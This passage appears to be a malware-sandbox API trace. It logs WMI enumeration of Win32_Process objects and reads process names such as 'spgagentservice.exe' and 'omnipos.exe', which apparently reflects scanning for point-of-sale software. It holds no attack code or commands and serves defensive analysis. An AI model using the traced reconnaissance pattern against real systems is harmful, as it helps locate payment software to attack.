puReturned=0x27bb39c*=0x1) returned 0x0 [0279.759] IMarshal:GetUnmarshalClass (in: This=0x571c9e4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.759] IUnknown:Release (This=0x571c9e4) returned 0x3 [0279.760] IWbemClassObject:Get (in: This=0x571c9e0, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.760] IWbemClassObject:Get (in: This=0x571c9e0, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1136\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.760] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.760] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.760] IUnknown:Release (This=0x500344) returned 0x1 [0279.761] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x571c478) returned 0x0 [0279.761] WbemDefPath:IUnknown:QueryInterface (in: This=0x571c478, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.761] WbemDefPath:IClassFactory:CreateInstance (in: This=0x571c478, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5719558) returned 0x0 [0279.761] WbemDefPath:IUnknown:Release (This=0x571c478) returned 0x0 [0279.761] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719558, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5719558) returned 0x0 [0279.762] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719558, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.762] WbemDefPath:IUnknown:AddRef (This=0x5719558) returned 0x3 [0279.762] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719558, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.762] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719558, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.762] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719558, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x571c488) returned 0x0 [0279.762] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x571c488, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.762] WbemDefPath:IUnknown:Release (This=0x571c488) returned 0x3 [0279.762] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719558, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.763] WbemDefPath:IUnknown:Release (This=0x5719558) returned 0x2 [0279.763] WbemDefPath:IUnknown:Release (This=0x5719558) returned 0x1 [0279.763] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719558, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5719558) returned 0x0 [0279.763] WbemDefPath:IUnknown:AddRef (This=0x5719558) returned 0x3 [0279.763] WbemDefPath:IUnknown:Release (This=0x5719558) returned 0x2 [0279.763] WbemDefPath:IWbemPath:SetText (This=0x5719558, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1136\"") returned 0x0 [0279.763] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.763] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.763] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.763] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.763] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.763] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.763] IWbemClassObject:Get (in: This=0x571c9e0, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27da6d4*=0, plFlavor=0x27da6d8*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="spgagentservice.exe", varVal2=0x0), pType=0x27da6d4*=8, plFlavor=0x27da6d8*=0) returned 0x0 [0279.764] IWbemClassObject:Get (in: This=0x571c9e0, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27da6d4*=8, plFlavor=0x27da6d8*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="spgagentservice.exe", varVal2=0x0), pType=0x27da6d4*=8, plFlavor=0x27da6d8*=0) returned 0x0 [0279.764] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x571c4b8, puReturned=0x27bb39c | out: apObjects=0x571c4b8*=0x571cb78, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.765] IMarshal:GetUnmarshalClass (in: This=0x571cb7c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.765] IUnknown:Release (This=0x571cb7c) returned 0x3 [0279.765] IWbemClassObject:Get (in: This=0x571cb78, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.765] IWbemClassObject:Get (in: This=0x571cb78, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2732\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.766] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.766] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.766] IUnknown:Release (This=0x500344) returned 0x1 [0279.767] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x571c4b8) returned 0x0 [0279.767] WbemDefPath:IUnknown:QueryInterface (in: This=0x571c4b8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.767] WbemDefPath:IClassFactory:CreateInstance (in: This=0x571c4b8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5719638) returned 0x0 [0279.767] WbemDefPath:IUnknown:Release (This=0x571c4b8) returned 0x0 [0279.767] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719638, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5719638) returned 0x0 [0279.767] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719638, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.767] WbemDefPath:IUnknown:AddRef (This=0x5719638) returned 0x3 [0279.767] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719638, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.767] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719638, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.767] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719638, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x571c4c8) returned 0x0 [0279.768] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x571c4c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.768] WbemDefPath:IUnknown:Release (This=0x571c4c8) returned 0x3 [0279.768] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719638, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.768] WbemDefPath:IUnknown:Release (This=0x5719638) returned 0x2 [0279.768] WbemDefPath:IUnknown:Release (This=0x5719638) returned 0x1 [0279.768] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719638, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5719638) returned 0x0 [0279.768] WbemDefPath:IUnknown:AddRef (This=0x5719638) returned 0x3 [0279.768] WbemDefPath:IUnknown:Release (This=0x5719638) returned 0x2 [0279.768] WbemDefPath:IWbemPath:SetText (This=0x5719638, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2732\"") returned 0x0 [0279.769] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.769] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.769] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.769] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.769] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.769] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.769] IWbemClassObject:Get (in: This=0x571cb78, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27daf60*=0, plFlavor=0x27daf64*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="omnipos.exe", varVal2=0x0), pType=0x27daf60*=8, plFlavor=0x27daf64*=0) returned 0x0 [0279.769] IWbemClassObject:Get (in: This=0x571cb78, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27daf60*=8, plFlavor=0x27daf64*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="omnipos.exe", varVal2=0x0), pType=0x27daf60*=8, plFlavor=0x27daf64*=0) returned 0x0 [0279.769] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x571c4f8, puReturned=0x27bb39c | out: apObjects=0x571c4f8*=0x571cd10, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.771] IMarshal:GetUnmarshalClass (in: This=0x571cd14, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.771] IUnknown:Release (This=0x571cd14) returned 0x3 [0279.771] IWbemClassObject:Get (in: This=0x571cd10, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.772] IWbemClassObject:Get (in: This=0x571cd10, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2760\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.772] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.772] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.772] IUnknown:Release (This=0x500344) returned 0x1 [0279.773] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x571c4f8) returned 0x0 [0279.773] WbemDefPath:IUnknown:QueryInterface (in: This=0x571c4f8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.773] WbemDefPath:IClassFactory:CreateInstance (in: This=0x571c4f8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5719718) returned 0x0 [0279.773] WbemDefPath:IUnknown:Release (This=0x571c4f8) returned 0x0 [0279.773] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719718, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5719718) returned 0x0 [0279.773] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719718, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.773] WbemDefPath:IUnknown:AddRef (This=0x5719718) returned 0x3 [0279.773] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719718, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.773] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719718, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.774] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719718, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x571c508) returned 0x0 [0279.774] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x571c508, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.774] WbemDefPath:IUnknown:Release (This=0x571c508) returned 0x3 [0279.774] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719718, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.774] WbemDefPath:IUnknown:Release (This=0x5719718) returned 0x2 [0279.774] WbemDefPath:IUnknown:Release (This=0x5719718) returned 0x1 [0279.774] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719718, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5719718) returned 0x0 [0279.774] WbemDefPath:IUnknown:AddRef (This=0x5719718) returned 0x3 [0279.774] WbemDefPath:IUnknown:Release (This=0x5719718) returned 0x2 [0279.774] WbemDefPath:IWbemPath:SetText (This=0x5719718, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2760\"") returned 0x0 [0279.775] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.775] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.775] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.775] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.775] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.775] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.775] IWbemClassObject:Get (in: This=0x571cd10, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, 